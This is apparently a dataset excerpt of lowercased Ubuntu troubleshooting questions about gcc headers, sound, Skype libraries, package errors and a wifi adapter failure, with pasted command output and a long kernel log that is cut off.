442539	i have updated gcc , but g++ still seems to be using the stl files from the old gcc	i run ubuntu 12.04 . recently , i have followed this post and updated gcc to 4.8.1 . now , when i compile with g++ , i get compiler output like these : /usr/include/c++/4.6/bits/stl_algobase.h:743 : note : profitability threshold = 6 /usr/include/c++/4.6/bits/stl_algobase.h:743 : note : profitability threshold is 6 loop iterations . /usr/include/c++/4.6/bits/stl_algobase.h:743 : note : loop vectorized . my question is why is g++ using the stls from gcc 4.6 ? is this normal or does this show that i did n't updated gcc thoroughly ? if the latter , how can i direct g++ to the new stls ? edit0 : i installed package g++-4.8 ( just now , thanks steeldriver ) but still get the same messages~ edit1 : i followed kenn 's suggestion and just ran sudo ldconfig ... but i still get those messages thanks in advance ,
442541	no sound in ubuntu studio	i have strange problem . after installing ubuntu studio , i had no sound and after changing default card in alsa i have it but only in players . in web browsers ( firefox , chromium ) , i have sound only on root account . alsamixer default card . and her qasmixer default card ( on root account i have something like on the 1st pic ) . i hope you will understand about what i am talking about and thanks for help : )
442542	how to run programs as root user without using terminal	i want to run the programs as root user without using the terminal command line , is that possible to do like that ? if yes tell me please . thanks .
442544	jdownloader installation gone wrong ?	so right off the bat i want to apologize for my inexperience . i usually like figuring stuff out myself rather than being a nuisance to other people . but this is my first day using ubuntu , i am not really great with computers in general and i just can not seem to manage . so i tried to install jdownloader . i am pretty sure i did something wrong as , well , it did n't work . so basically i followed the instructions of wikihow ( adorable , right ? ) and got to step 4 but after entering sudo apt-get install jdownloader instead of getting something that lets me type y or n ( step 5 ) , i get e : unable to locate package jdownloader if anyone could help somehow and would take the time for a stupid beginner 's mistake , that 'd really be great .
442548	is 55째c a safe temperature for a acer aspire one d255 ?	i am new to using ubuntu on laptops and netbooks . i was wondering if this is a safe/good temperature . adapter : virtual device temp1 : +55.0째c ( crit = +100.0째c ) if not how can i fix this , i do n't want to run the windows 7 starer again also the side of the laptop feels a bit warm and i am not sure about that cues there is only one vent and i assume that is just the hot air being pushed out .
442549	boot into windows 7 from ubuntu	how to boot into windows 7 ( or other os ) without having to select it from the grub menu ? note that i am not trying to switch the order in the menu , i 'm looking for a way in ubuntu to temorarily do something like `` restart and boot into x '' . can this be accomplished ?
442550	ca n't install package libclassicclient	this is the output of `` sudo apt-get install libclassicclient '' : user1 @ laptop : ~ $ sudo apt-get install libclassicclient reading package lists ... done building dependency tree reading state information ... done libclassicclient is already the newest version . 0 upgraded , 0 newly installed , 0 to remove and 13 not upgraded . 1 not fully installed or removed . after this operation , 0 b of additional disk space will be used . do you want to continue [ y/n ] ? y setting up libclassicclient ( 6.1.0-b08 ) ... warning : libsqlite3.so could not be found . creating symbolic link ... /usr/lib / ls : can not access libsqlite3.so : too many levels of symbolic links ln : failed to create symbolic link â./libsqlite3.soâ : file exists / creating symbolic link done . * stopping the hotplug events dispatcher udevd [ ok ] dpkg : error processing libclassicclient ( -- configure ) : subprocess installed post-installation script returned error exit status 1 processing triggers for libc-bin ... errors were encountered while processing : libclassicclient e : sub-process /usr/bin/dpkg returned an error code ( 1 ) any suggestions ? ps : user1 @ laptop : /lib $ ldconfig -p | grep classic user1 @ laptop : /lib $ thanks !
442555	tough time installing skype on ubuntu 12.10 64bit	system is all upgraded using sudo apt-get update & & sudo apt-get upgrade & & sudo apt-get clean then sudo apt-get install skype followed by the result amolp @ xiplr001 : ~/downloads $ ldd /usr/bin/skype /usr/bin/skype : /opt/mcafee/runtime/2.0/lib/libstdc++.so.6 : version `glibcxx_3.4.9 ' not found ( required by /usr/bin/skype ) /usr/bin/skype : /opt/mcafee/runtime/2.0/lib/libstdc++.so.6 : version `glibcxx_3.4.11 ' not found ( required by /usr/bin/skype ) /usr/bin/skype : /opt/mcafee/runtime/2.0/lib/libstdc++.so.6 : version `glibcxx_3.4.15 ' not found ( required by /usr/bin/skype ) /usr/bin/skype : /opt/mcafee/runtime/2.0/lib/libc.so.6 : version `glibc_2.7 ' not found ( required by /usr/bin/skype ) linux-gate.so.1 = > ( 0xf77e1000 ) libasound.so.2 = > not found libxv.so.1 = > not found libxss.so.1 = > not found librt.so.1 = > /opt/mcafee/runtime/2.0/lib/librt.so.1 ( 0xf59e1000 ) libdl.so.2 = > /opt/mcafee/runtime/2.0/lib/libdl.so.2 ( 0xf59dc000 ) libx11.so.6 = > not found libxext.so.6 = > not found libqtdbus.so.4 = > not found libqtwebkit.so.4 = > not found libqtxml.so.4 = > not found libqtgui.so.4 = > not found libqtnetwork.so.4 = > not found libqtcore.so.4 = > not found libpthread.so.0 = > /opt/mcafee/runtime/2.0/lib/libpthread.so.0 ( 0xf5989000 ) libstdc++.so.6 = > /opt/mcafee/runtime/2.0/lib/libstdc++.so.6 ( 0xf58a9000 ) libm.so.6 = > /opt/mcafee/runtime/2.0/lib/libm.so.6 ( 0xf5884000 ) libgcc_s.so.1 = > /opt/mcafee/runtime/2.0/lib/libgcc_s.so.1 ( 0xf5879000 ) libc.so.6 = > /opt/mcafee/runtime/2.0/lib/libc.so.6 ( 0xf575b000 ) /lib/ld-linux.so.2 ( 0xf77e2000 ) amolp @ xiplr001 : ~/downloads $ skype skype : error while loading shared libraries : libasound.so.2 : can not open shared object file : no such file or directory amolp @ xiplr001 : ~/downloads $ locate libstdc++.so.6 /opt/mcafee/runtime/2.0/lib/libstdc++.so.6 /opt/mcafee/runtime/2.0/lib/libstdc++.so.6.0.8 /usr/lib/libstdc++.so.6 /usr/lib/i386-linux-gnu/libstdc++.so.6 /usr/lib/i386-linux-gnu/libstdc++.so.6.0.17 /usr/lib/x86_64-linux-gnu/libstdc++.so.6 /usr/lib/x86_64-linux-gnu/libstdc++.so.6.0.17 amolp @ xiplr001 : ~/downloads $ gcc -v using built-in specs . collect_gcc=gcc collect_lto_wrapper=/usr/lib/gcc/x86_64-linux-gnu/4.7/lto-wrapper target : x86_64-linux-gnu configured with : ../src/configure -v -- with-pkgversion='ubuntu/linaro 4.7.2-2ubuntu1 ' -- with-bugurl=file : ///usr/share/doc/gcc-4.7/readme.bugs -- enable-languages=c , c++ , go , fortran , objc , obj-c++ -- prefix=/usr -- program-suffix=-4.7 -- enable-shared -- enable-linker-build-id -- with-system-zlib -- libexecdir=/usr/lib -- without-included-gettext -- enable-threads=posix -- with-gxx-include-dir=/usr/include/c++/4.7 -- libdir=/usr/lib -- enable-nls -- with-sysroot=/ -- enable-clocale=gnu -- enable-libstdcxx-debug -- enable-libstdcxx-time=yes -- enable-gnu-unique-object -- enable-plugin -- enable-objc-gc -- disable-werror -- with-arch-32=i686 -- with-tune=generic -- enable-checking=release -- build=x86_64-linux-gnu -- host=x86_64-linux-gnu -- target=x86_64-linux-gnu thread model : posix gcc version 4.7.2 ( ubuntu/linaro 4.7.2-2ubuntu1 ) amolp @ xiplr001 : ~/downloads $ tried all deb below , but same result amolp @ xiplr001 : ~/downloads $ ls -l total 406956 -rw-rw-r -- 1 amolp amolp 8565 apr 2 00:53 amolpujari_1365597230_63.jpg -rw-r -- r -- 1 amolp amolp 50568944 apr 1 18:25 google-chrome-stable_current_amd64.deb -rw-rw-r -- 1 amolp amolp 297863816 apr 2 19:08 mysql-5.6.17-debian6.0-x86_64.deb -rw-r -- r -- 1 amolp amolp 29342422 jul 19 2012 skype-ubuntu_4.0.0.7-1_amd64.deb -rw-rw-r -- 1 amolp amolp 16359174 apr 2 01:47 skype-ubuntu-lucid_4.2.0.13-1_i386.deb -rw-rw-r -- 1 amolp amolp 16299796 dec 19 00:23 skype-ubuntu-quantal_4.1.0.20-1_amd64.deb -rw-r -- r -- 1 amolp amolp 6253946 apr 1 17:24 sublime-text_build-3059_amd64.deb
442561	ubuntu 13.10 : ca n't connect to wifi	i guess i 'm using a very infamous wi-fi adapter because i 've tried everything out on the internet and i guess its time to ask for individual help : i ca n't seem to connect to my wi-fi network , i 'm on a desktop , with a network adapter , network adapter is : netgear wna1000m , i know its not a distance problem or a hardware problem since i can connect to wi-fi using windows ( i 'm dual-booting windows 8.1 and ubuntu 13.10 ) . and i do n't have any other hotspots so i decided to connect to an android hotspot and it worked . i do n't know whats wrong and i need help , the only solution right now is to usb tether my wi-fi using my samsung phone to my computer , and its not a solution i like , i would like to use wireless . thanks . edit there are no error messages , it keeps trying to connect and after two minutes i get a wireless network : disconnected , error dmesg output : [ 10.015356 ] microcode : cpu1 : new patch_level=0x01000083 [ 10.015370 ] microcode : cpu2 : patch_level=0x01000039 [ 10.015380 ] microcode : cpu2 : new patch_level=0x01000083 [ 10.015516 ] microcode : microcode update driver : v2.00 < tigran @ aivazian.fsnet.co.uk > , peter oruba [ 10.201938 ] usb 2-3 : new usb device found , idvendor=046d , idproduct=c52b [ 10.201946 ] usb 2-3 : new usb device strings : mfr=1 , product=2 , serialnumber=0 [ 10.201949 ] usb 2-3 : product : usb receiver [ 10.201951 ] usb 2-3 : manufacturer : logitech [ 10.517730 ] kvm : nested virtualization enabled [ 10.517740 ] kvm : nested paging enabled [ 11.070492 ] acpi : pci interrupt link [ aaza ] enabled at irq 22 [ 11.070504 ] hda_intel : disabling msi [ 11.070545 ] snd_hda_intel 0000:00:05.0 : setting latency timer to 64 [ 11.070549 ] hda-intel 0000:00:05.0 : disabling 64bit dma [ 11.074515 ] hda-intel 0000:00:05.0 : enable delay in rirb handling [ 11.818560 ] hda_codec : alc1200 : sku not ready 0x411111f0 [ 11.898489 ] autoconfig : line_outs=4 ( 0x14/0x15/0x16/0x17/0x0 ) type : line [ 11.898496 ] speaker_outs=0 ( 0x0/0x0/0x0/0x0/0x0 ) [ 11.898498 ] hp_outs=1 ( 0x1b/0x0/0x0/0x0/0x0 ) [ 11.898500 ] mono : mono_out=0x0 [ 11.898501 ] dig-out=0x11/0x0 [ 11.898503 ] inputs : [ 11.898505 ] front mic=0x19 [ 11.898507 ] rear mic=0x18 [ 11.898508 ] line=0x1c [ 11.898509 ] aux=0x1a [ 11.898513 ] realtek : no valid ssid , checking pincfg 0x411111f0 for nid 0x1d [ 11.898514 ] realtek : enable default setup for auto mode as fallback [ 12.045982 ] cfg80211 : calling crda to update world regulatory domain [ 12.165349 ] hidraw : raw hid events driver ( c ) jiri kosina [ 12.284312 ] usbcore : registered new interface driver usbhid [ 12.284318 ] usbhid : usb hid core driver [ 12.319383 ] logitech-djreceiver 0003:046d : c52b.0003 : hiddev0 , hidraw0 : usb hid v1.11 device [ logitech usb receiver ] on usb-0000:00:02.0-3/input2 [ 12.324513 ] input : logitech unifying device . wireless pid:4009 as /devices/pci0000:00/0000:00:02.0/usb2/2-3/2-3:1.2/0003:046d : c52b.0003/input/input3 [ 12.324695 ] logitech-djdevice 0003:046d : c52b.0004 : input , hidraw1 : usb hid v1.11 mouse [ logitech unifying device . wireless pid:4009 ] on usb-0000:00:02.0-3:1 [ 12.651027 ] rtl8192cu : chip version 0x10 [ 12.759674 ] rtl8192cu : mac address : e0:46:9a:32:60:12 [ 12.759682 ] rtl8192cu : board type 0 [ 12.759917 ] rtl_usb : rx_max_size 15360 , rx_urb_num 8 , in_ep 1 [ 12.759979 ] rtl8192cu : loading firmware rtlwifi/rtl8192cufw.bin [ 12.760169 ] usbcore : registered new interface driver rtl8192cu [ 12.879925 ] type=1400 audit ( 1396462775.602:2 ) : apparmor= '' status '' operation= '' profile_load '' parent=448 profile= '' unconfined '' name= '' /sbin/dhclient '' pid=449 comm= '' apparmor_parser '' [ 12.879937 ] type=1400 audit ( 1396462775.602:3 ) : apparmor= '' status '' operation= '' profile_load '' parent=448 profile= '' unconfined '' name= '' /usr/lib/networkmanager/nm-dhcp-client.action '' pid=449 comm= '' apparmor_parser '' [ 12.879943 ] type=1400 audit ( 1396462775.602:4 ) : apparmor= '' status '' operation= '' profile_load '' parent=448 profile= '' unconfined '' name= '' /usr/lib/connman/scripts/dhclient-script '' pid=449 comm= '' apparmor_parser '' [ 12.879970 ] type=1400 audit ( 1396462775.602:5 ) : apparmor= '' status '' operation= '' profile_replace '' parent=376 profile= '' unconfined '' name= '' /sbin/dhclient '' pid=383 comm= '' apparmor_parser '' [ 12.879985 ] type=1400 audit ( 1396462775.602:6 ) : apparmor= '' status '' operation= '' profile_replace '' parent=376 profile= '' unconfined '' name= '' /usr/lib/networkmanager/nm-dhcp-client.action '' pid=383 comm= '' apparmor_parser '' [ 12.879992 ] type=1400 audit ( 1396462775.602:7 ) : apparmor= '' status '' operation= '' profile_replace '' parent=376 profile= '' unconfined '' name= '' /usr/lib/connman/scripts/dhclient-script '' pid=383 comm= '' apparmor_parser '' [ 12.880724 ] type=1400 audit ( 1396462775.602:8 ) : apparmor= '' status '' operation= '' profile_replace '' parent=448 profile= '' unconfined '' name= '' /usr/lib/networkmanager/nm-dhcp-client.action '' pid=449 comm= '' apparmor_parser '' [ 12.880734 ] type=1400 audit ( 1396462775.602:9 ) : apparmor= '' status '' operation= '' profile_replace '' parent=448 profile= '' unconfined '' name= '' /usr/lib/connman/scripts/dhclient-script '' pid=449 comm= '' apparmor_parser '' [ 12.880775 ] type=1400 audit ( 1396462775.602:10 ) : apparmor= '' status '' operation= '' profile_replace '' parent=376 profile= '' unconfined '' name= '' /usr/lib/networkmanager/nm-dhcp-client.action '' pid=383 comm= '' apparmor_parser '' [ 12.880781 ] type=1400 audit ( 1396462775.602:11 ) : apparmor= '' status '' operation= '' profile_replace '' parent=376 profile= '' unconfined '' name= '' /usr/lib/connman/scripts/dhclient-script '' pid=383 comm= '' apparmor_parser '' [ 12.923561 ] ieee80211 phy0 : selected rate control algorithm 'rtl_rc' [ 12.924158 ] rtlwifi : wireless switch is on [ 13.349526 ] cfg80211 : world regulatory domain updated : [ 13.349534 ] cfg80211 : ( start_freq - end_freq @ bandwidth ) , ( max_antenna_gain , max_eirp ) [ 13.349537 ] cfg80211 : ( 2402000 khz - 2472000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) [ 13.349540 ] cfg80211 : ( 2457000 khz - 2482000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) [ 13.349542 ] cfg80211 : ( 2474000 khz - 2494000 khz @ 20000 khz ) , ( 300 mbi , 2000 mbm ) [ 13.349543 ] cfg80211 : ( 5170000 khz - 5250000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) [ 13.349545 ] cfg80211 : ( 5735000 khz - 5835000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) [ 13.552319 ] nvidia : module license 'nvidia ' taints kernel . [ 13.552327 ] disabling lock debugging due to kernel taint [ 13.801071 ] input : hda nvidia front headphone as /devices/pci0000:00/0000:00:05.0/sound/card0/input4 [ 13.801204 ] input : hda nvidia line out side as /devices/pci0000:00/0000:00:05.0/sound/card0/input5 [ 13.801308 ] input : hda nvidia line out clfe as /devices/pci0000:00/0000:00:05.0/sound/card0/input6 [ 13.801408 ] input : hda nvidia line out surround as /devices/pci0000:00/0000:00:05.0/sound/card0/input7 [ 13.801501 ] input : hda nvidia line out front as /devices/pci0000:00/0000:00:05.0/sound/card0/input8 [ 13.801597 ] input : hda nvidia line as /devices/pci0000:00/0000:00:05.0/sound/card0/input9 [ 13.801692 ] input : hda nvidia rear mic as /devices/pci0000:00/0000:00:05.0/sound/card0/input10 [ 13.801790 ] input : hda nvidia front mic as /devices/pci0000:00/0000:00:05.0/sound/card0/input11 [ 13.802644 ] acpi : pci interrupt link [ aigp ] enabled at irq 21 [ 13.802668 ] nvidia 0000:00:0d.0 : setting latency timer to 64 [ 13.802674 ] vgaarb : device changed decodes : pci:0000:00:0d.0 , olddecodes=io+mem , decodes=none : owns=io+mem [ 13.802984 ] nvrm : loading nvidia unix x86_64 kernel module 304.108 wed jul 31 19:35:17 pdt 2013 [ 13.897636 ] init : failsafe main process ( 521 ) killed by term signal [ 15.887720 ] bluetooth : core ver 2.16 [ 15.887799 ] net : registered protocol family 31 [ 15.887802 ] bluetooth : hci device and connection manager initialized [ 15.887823 ] bluetooth : hci socket layer initialized [ 15.887826 ] bluetooth : l2cap socket layer initialized [ 15.887833 ] bluetooth : sco socket layer initialized [ 16.123616 ] bluetooth : rfcomm tty layer initialized [ 16.123640 ] bluetooth : rfcomm socket layer initialized [ 16.123642 ] bluetooth : rfcomm ver 1.11 [ 16.248006 ] bluetooth : bnep ( ethernet emulation ) ver 1.3 [ 16.248013 ] bluetooth : bnep filters : protocol multicast [ 16.248038 ] bluetooth : bnep socket layer initialized [ 16.265889 ] init : avahi-cups-reload main process ( 715 ) terminated with status 1 [ 16.543251 ] ppdev : user-space parallel port driver [ 19.267116 ] init : udev-fallback-graphics main process ( 862 ) terminated with status 1 [ 21.923211 ] rtl8192cu : mac auto on okay ! [ 21.955936 ] rtl8192cu : tx queue select : 0x05 [ 22.318236 ] ipv6 : addrconf ( netdev_up ) : wlan0 : link is not ready [ 22.318917 ] ipv6 : addrconf ( netdev_up ) : wlan0 : link is not ready [ 22.324133 ] forcedeth 0000:00:07.0 : irq 43 for msi/msi-x [ 22.324180 ] forcedeth 0000:00:07.0 eth0 : msi enabled [ 22.324395 ] forcedeth 0000:00:07.0 eth0 : no link during initialization [ 22.324836 ] ipv6 : addrconf ( netdev_up ) : eth0 : link is not ready [ 22.325367 ] ipv6 : addrconf ( netdev_up ) : eth0 : link is not ready [ 141.264639 ] wlan0 : authenticate with c4:39:3a:15:63:88 [ 141.290695 ] wlan0 : send auth to c4:39:3a:15:63:88 ( try 1/3 ) [ 141.310379 ] wlan0 : authenticated [ 141.311341 ] wlan0 : associate with c4:39:3a:15:63:88 ( try 1/3 ) [ 141.341940 ] wlan0 : rx assocresp from c4:39:3a:15:63:88 ( capab=0xc11 status=0 aid=5 ) [ 141.342103 ] wlan0 : associated [ 141.343566 ] ipv6 : addrconf ( netdev_change ) : wlan0 : link becomes ready [ 141.344148 ] cfg80211 : calling crda for country : us [ 141.350359 ] cfg80211 : regulatory domain changed to country : us [ 141.350365 ] cfg80211 : ( start_freq - end_freq @ bandwidth ) , ( max_antenna_gain , max_eirp ) [ 141.350369 ] cfg80211 : ( 2402000 khz - 2472000 khz @ 40000 khz ) , ( 300 mbi , 2700 mbm ) [ 141.350371 ] cfg80211 : ( 5170000 khz - 5250000 khz @ 40000 khz ) , ( 300 mbi , 1700 mbm ) [ 141.350373 ] cfg80211 : ( 5250000 khz - 5330000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) [ 141.350375 ] cfg80211 : ( 5490000 khz - 5600000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) [ 141.350376 ] cfg80211 : ( 5650000 khz - 5710000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) [ 141.350378 ] cfg80211 : ( 5735000 khz - 5835000 khz @ 40000 khz ) , ( 300 mbi , 3000 mbm ) [ 141.350380 ] cfg80211 : ( 57240000 khz - 63720000 khz @ 2160000 khz ) , ( n/a , 4000 mbm ) [ 195.184578 ] wlan0 : deauthenticating from c4:39:3a:15:63:88 by local choice ( reason=3 ) [ 195.204481 ] cfg80211 : calling crda to update world regulatory domain [ 195.210009 ] cfg80211 : world regulatory domain updated : [ 195.210017 ] cfg80211 : ( start_freq - end_freq @ bandwidth ) , ( max_antenna_gain , max_eirp ) [ 195.210020 ] cfg80211 : ( 2402000 khz - 2472000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) [ 195.210022 ] cfg80211 : ( 2457000 khz - 2482000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) [ 195.210024 ] cfg80211 : ( 2474000 khz - 2494000 khz @ 20000 khz ) , ( 300 mbi , 2000 mbm ) [ 195.210026 ] cfg80211 : ( 5170000 khz - 5250000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) [ 195.210027 ] cfg80211 : ( 5735000 khz - 5835000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) [ 215.229015 ] usb 1-6 : usb disconnect , device number 4 [ 638.077096 ] rtl8192cu : mac auto on okay ! [ 638.110688 ] rtl8192cu : tx queue select : 0x05 [ 638.477706 ] ipv6 : addrconf ( netdev_up ) : wlan0 : link is not ready [ 646.573786 ] wlan0 : authenticate with c4:39:3a:15:63:88 [ 646.598779 ] wlan0 : send auth to c4:39:3a:15:63:88 ( try 1/3 ) [ 646.617499 ] wlan0 : authenticated [ 646.620877 ] wlan0 : associate with c4:39:3a:15:63:88 ( try 1/3 ) [ 646.632645 ] wlan0 : rx assocresp from c4:39:3a:15:63:88 ( capab=0xc01 status=0 aid=2 ) [ 646.632753 ] wlan0 : associated [ 646.633526 ] ipv6 : addrconf ( netdev_change ) : wlan0 : link becomes ready [ 646.634083 ] cfg80211 : calling crda for country : us [ 646.643670 ] cfg80211 : regulatory domain changed to country : us [ 646.643681 ] cfg80211 : ( start_freq - end_freq @ bandwidth ) , ( max_antenna_gain , max_eirp ) [ 646.643687 ] cfg80211 : ( 2402000 khz - 2472000 khz @ 40000 khz ) , ( 300 mbi , 2700 mbm ) [ 646.643691 ] cfg80211 : ( 5170000 khz - 5250000 khz @ 40000 khz ) , ( 300 mbi , 1700 mbm ) [ 646.643695 ] cfg80211 : ( 5250000 khz - 5330000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) [ 646.643698 ] cfg80211 : ( 5490000 khz - 5600000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) [ 646.643702 ] cfg80211 : ( 5650000 khz - 5710000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) [ 646.643705 ] cfg80211 : ( 5735000 khz - 5835000 khz @ 40000 khz ) , ( 300 mbi , 3000 mbm ) [ 646.643709 ] cfg80211 : ( 57240000 khz - 63720000 khz @ 2160000 khz ) , ( n/a , 4000 mbm ) [ 646.644019 ] show_signal_msg : 180 callbacks suppressed [ 646.644025 ] wpa_supplicant [ 989 ] : segfault at 200000008 ip 00000000004b1795 sp 00007fff3eaf63e0 error 4 in wpa_supplicant [ 400000+15f000 ] [ 649.311097 ] wlan0 : deauthenticating from c4:39:3a:15:63:88 by local choice ( reason=2 ) [ 649.340167 ] cfg80211 : calling crda to update world regulatory domain [ 649.349652 ] cfg80211 : world regulatory domain updated : [ 649.349663 ] cfg80211 : ( start_freq - end_freq @ bandwidth ) , ( max_antenna_gain , max_eirp ) [ 649.349669 ] cfg80211 : ( 2402000 khz - 2472000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) [ 649.349674 ] cfg80211 : ( 2457000 khz - 2482000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) [ 649.349678 ] cfg80211 : ( 2474000 khz - 2494000 khz @ 20000 khz ) , ( 300 mbi , 2000 mbm ) [ 649.349681 ] cfg80211 : ( 5170000 khz - 5250000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) [ 649.349685 ] cfg80211 : ( 5735000 khz - 5835000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) [ 650.147130 ] wlan0 : authenticate with c4:39:3a:15:63:88 [ 650.171451 ] wlan0 : send auth to c4:39:3a:15:63:88 ( try 1/3 ) [ 650.173091 ] wlan0 : authenticated [ 650.173916 ] wlan0 : associate with c4:39:3a:15:63:88 ( try 1/3 ) [ 650.180969 ] wlan0 : rx assocresp from c4:39:3a:15:63:88 ( capab=0xc01 status=0 aid=2 ) [ 650.181026 ] wlan0 : associated [ 650.181227 ] cfg80211 : calling crda for country : us [ 650.188718 ] cfg80211 : regulatory domain changed to country : us [ 650.188728 ] cfg80211 : ( start_freq - end_freq @ bandwidth ) , ( max_antenna_gain , max_eirp ) [ 650.188734 ] cfg80211 : ( 2402000 khz - 2472000 khz @ 40000 khz ) , ( 300 mbi , 2700 mbm ) [ 650.188738 ] cfg80211 : ( 5170000 khz - 5250000 khz @ 40000 khz ) , ( 300 mbi , 1700 mbm ) [ 650.188742 ] cfg80211 : ( 5250000 khz - 5330000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) [ 650.188746 ] cfg80211 : ( 5490000 khz - 5600000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) [ 650.188749 ] cfg80211 : ( 5650000 khz - 5710000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) [ 650.188753 ] cfg80211 : ( 5735000 khz - 5835000 khz @ 40000 khz ) , ( 300 mbi , 3000 mbm ) [ 650.188757 ] cfg80211 : ( 57240000 khz - 63720000 khz @ 2160000 khz ) , ( n/a , 4000 mbm ) [ 712.805160 ] wlan0 : deauthenticating from c4:39:3a:15:63:88 by local choice ( reason=3 ) [ 712.819958 ] cfg80211 : calling crda to update world regulatory domain [ 712.829068 ] cfg80211 : world regulatory domain updated : [ 712.829079 ] cfg80211 : ( start_freq - end_freq @ bandwidth ) , ( max_antenna_gain , max_eirp ) [ 712.829085 ] cfg80211 : ( 2402000 khz - 2472000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) [ 712.829090 ] cfg80211 : ( 2457000 khz - 2482000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) [ 712.829094 ] cfg80211 : ( 2474000 khz - 2494000 khz @ 20000 khz ) , ( 300 mbi , 2000 mbm ) [ 712.829097 ] cfg80211 : ( 5170000 khz - 5250000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) [ 712.829101 ] cfg80211 : ( 5735000 khz - 5835000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) [ 725.371621 ] usb 1-6 : new high-speed usb device number 6 using ehci-pci [ 725.504965 ] usb 1-6 : new usb device found , idvendor=04e8 , idproduct=6865 [ 725.504972 ] usb 1-6 : new usb device strings : mfr=2 , product=3 , serialnumber=4 [ 725.504977 ] usb 1-6 : product : samsung_android_sph-l710 [ 725.504982 ] usb 1-6 : manufacturer : samsung [ 725.504985 ] usb 1-6 : serialnumber : 7a82037e [ 737.490716 ] usb 1-6 : usb disconnect , device number 6 [ 737.761358 ] usb 1-6 : new high-speed usb device number 7 using ehci-pci [ 737.894839 ] usb 1-6 : new usb device found , idvendor=04e8 , idproduct=6863 [ 737.894851 ] usb 1-6 : new usb device strings : mfr=2 , product=3 , serialnumber=4 [ 737.894857 ] usb 1-6 : product : samsung_android_sph-l710 [ 737.894862 ] usb 1-6 : manufacturer : samsung [ 737.894866 ] usb 1-6 : serialnumber : 7a82037e [ 737.966008 ] usbcore : registered new interface driver cdc_ether [ 737.974913 ] rndis_host 1-6:1.0 usb0 : register 'rndis_host ' at usb-0000:00:02.1-6 , rndis device , 02:04:56:5d:32:30 [ 737.975001 ] usbcore : registered new interface driver rndis_host [ 873.870741 ] wlan0 : authenticate with c4:39:3a:15:63:88 [ 873.897613 ] wlan0 : send auth to c4:39:3a:15:63:88 ( try 1/3 ) [ 873.909169 ] wlan0 : authenticated [ 873.910011 ] wlan0 : associate with c4:39:3a:15:63:88 ( try 1/3 ) [ 873.922705 ] wlan0 : rx assocresp from c4:39:3a:15:63:88 ( capab=0xc01 status=0 aid=2 ) [ 873.922874 ] wlan0 : associated [ 873.924285 ] cfg80211 : calling crda for country : us [ 873.943481 ] cfg80211 : regulatory domain changed to country : us [ 873.943489 ] cfg80211 : ( start_freq - end_freq @ bandwidth ) , ( max_antenna_gain , max_eirp ) [ 873.943492 ] cfg80211 : ( 2402000 khz - 2472000 khz @ 40000 khz ) , ( 300 mbi , 2700 mbm ) [ 873.943495 ] cfg80211 : ( 5170000 khz - 5250000 khz @ 40000 khz ) , ( 300 mbi , 1700 mbm ) [ 873.943497 ] cfg80211 : ( 5250000 khz - 5330000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) [ 873.943498 ] cfg80211 : ( 5490000 khz - 5600000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) [ 873.943500 ] cfg80211 : ( 5650000 khz - 5710000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) [ 873.943502 ] cfg80211 : ( 5735000 khz - 5835000 khz @ 40000 khz ) , ( 300 mbi , 3000 mbm ) [ 873.943504 ] cfg80211 : ( 57240000 khz - 63720000 khz @ 2160000 khz ) , ( n/a , 4000 mbm ) [ 919.672553 ] wlan0 : deauthenticating from c4:39:3a:15:63:88 by local choice ( reason=3 ) [ 919.689846 ] cfg80211 : calling crda to update world regulatory domain [ 919.703994 ] cfg80211 : world regulatory domain updated : [ 919.704002 ] cfg80211 : ( start_freq - end_freq @ bandwidth ) , ( max_antenna_gain , max_eirp ) [ 919.704005 ] cfg80211 : ( 2402000 khz - 2472000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) [ 919.704007 ] cfg80211 : ( 2457000 khz - 2482000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) [ 919.704009 ] cfg80211 : ( 2474000 khz - 2494000 khz @ 20000 khz ) , ( 300 mbi , 2000 mbm ) [ 919.704011 ] cfg80211 : ( 5170000 khz - 5250000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) [ 919.704013 ] cfg80211 : ( 5735000 khz - 5835000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) [ 1245.421301 ] wlan0 : authenticate with c4:39:3a:15:63:88 [ 1245.447720 ] wlan0 : send auth to c4:39:3a:15:63:88 ( try 1/3 ) [ 1245.449655 ] wlan0 : authenticated [ 1245.452036 ] wlan0 : associate with c4:39:3a:15:63:88 ( try 1/3 ) [ 1245.464247 ] wlan0 : rx assocresp from c4:39:3a:15:63:88 ( capab=0xc01 status=0 aid=2 ) [ 1245.464314 ] wlan0 : associated [ 1245.464643 ] cfg80211 : calling crda for country : us [ 1245.473437 ] cfg80211 : regulatory domain changed to country : us [ 1245.473445 ] cfg80211 : ( start_freq - end_freq @ bandwidth ) , ( max_antenna_gain , max_eirp ) [ 1245.473448 ] cfg80211 : ( 2402000 khz - 2472000 khz @ 40000 khz ) , ( 300 mbi , 2700 mbm ) [ 1245.473451 ] cfg80211 : ( 5170000 khz - 5250000 khz @ 40000 khz ) , ( 300 mbi , 